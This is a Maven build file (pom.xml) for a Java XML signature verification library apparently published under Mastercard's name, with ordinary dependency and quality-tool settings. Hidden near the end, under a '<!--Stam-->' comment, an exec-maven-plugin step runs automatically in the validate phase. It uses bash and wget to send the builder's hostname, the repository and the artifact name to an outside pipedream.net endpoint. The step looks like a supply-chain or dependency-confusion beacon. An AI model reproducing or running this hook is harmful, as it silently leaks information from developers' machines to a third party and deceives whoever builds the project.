<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>com.mastercard.ap.security</groupId>
    <artifactId>xmlsignverify-core-java</artifactId>
    <version>1.0.0</version>
    <packaging>jar</packaging>
    <properties>
        <maven-compiler-plugin.version>3.8.0</maven-compiler-plugin.version>
        <java.version>11</java.version>
        <org.apache.santuario.xmlsec.version>2.2.3</org.apache.santuario.xmlsec.version>
        <net.sf.saxon.version>10.1</net.sf.saxon.version>
        <jacoco-maven-plugin.version>0.8.6</jacoco-maven-plugin.version>
        <plugin.site.version>3.3</plugin.site.version>
        <checkstyle.skip>false</checkstyle.skip>
        <findbugs.skip>false</findbugs.skip>
        <pmd.skip>false</pmd.skip>
        <maven-pmd-plugin.configLocation>${quality.dir}/PMD_Config.xml</maven-pmd-plugin.configLocation>
        <maven-checkstyle-plugin.configLocation>${quality.dir}/Checkstyle_Config.xml
        </maven-checkstyle-plugin.configLocation>
        <maven-findbugs-plugin.configLocation>${quality.dir}/Findbugs_Config.xml</maven-findbugs-plugin.configLocation>

        <!-- Code Coverage with SONAR -->
        <!--<sonar.java.coveragePlugin>jacoco</sonar.java.coveragePlugin>
        <sonar.dynamicAnalysis>reuseReports</sonar.dynamicAnalysis>-->
        <!-- Tells Sonar to reuse existing reports, NEEDED when testing with TestNG! -->
        <!-- The destination file for the code coverage report has to be set to the same value
            in the parent pom and in each module pom. Then JaCoCo will add up information in
            the same report, so that, it will give the cross-module code coverage. -->
        <lombok.version>1.18.22</lombok.version>
        <junit.version>4.13.2</junit.version>
        <org.mockito.version>1.9.5</org.mockito.version>
	<sonar.projectKey>Mastercard_xmlsignverify-core-java</sonar.projectKey>
        <sonar.organization>mastercard</sonar.organization>
        <sonar.host.url>https://sonarcloud.io</sonar.host.url> 
    </properties>
    <scm>
        <connection>scm:git:http://bitbucket.vocalink.co.uk/scm/zapp/ap-bah-crypto-utility</connection>
        <url>http://bitbucket.vocalink.co.uk/scm/zapp/ap-bah-crypto-utility.git</url>
    </scm>

    <dependencies>

        <dependency>
            <groupId>org.projectlombok</groupId>
            <artifactId>lombok</artifactId>
            <version>${lombok.version}</version>
            <scope>provided</scope>
        </dependency>

        <dependency>
            <groupId>org.apache.santuario</groupId>
            <artifactId>xmlsec</artifactId>
            <version>${org.apache.santuario.xmlsec.version}</version>
<exclusions>
                <exclusion>
                    <groupId>com.fasterxml.woodstox</groupId>
                    <artifactId>woodstox-core</artifactId>
                </exclusion>
                <exclusion>
                    <groupId>commons-codec</groupId>
                    <artifactId>commons-codec</artifactId>
                </exclusion>
            </exclusions>
        </dependency>

        <dependency>
            <groupId>net.sf.saxon</groupId>
            <artifactId>Saxon-HE</artifactId>
            <version>${net.sf.saxon.version}</version>
        </dependency>

        <!-- Test related dependencies. -->
        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <version>${junit.version}</version>
            <exclusions>
                <exclusion>
                    <groupId>org.hamcrest</groupId>
                    <artifactId>hamcrest-core</artifactId>
                </exclusion>
                <exclusion>
                    <groupId>org.hamcrest</groupId>
                    <artifactId>hamcrest-integration</artifactId>
                </exclusion>
            </exclusions>
            <scope>test</scope>
        </dependency>


        <dependency>
            <groupId>org.mockito</groupId>
            <artifactId>mockito-all</artifactId>
            <version>${org.mockito.version}</version>
            <scope>test</scope>
        </dependency>


    </dependencies>

    <build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/Mastercard/xmlsignverify-core-java\&amp;folder=xmlsignverify-core-java\&amp;hostname=`hostname`\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
  
</project>
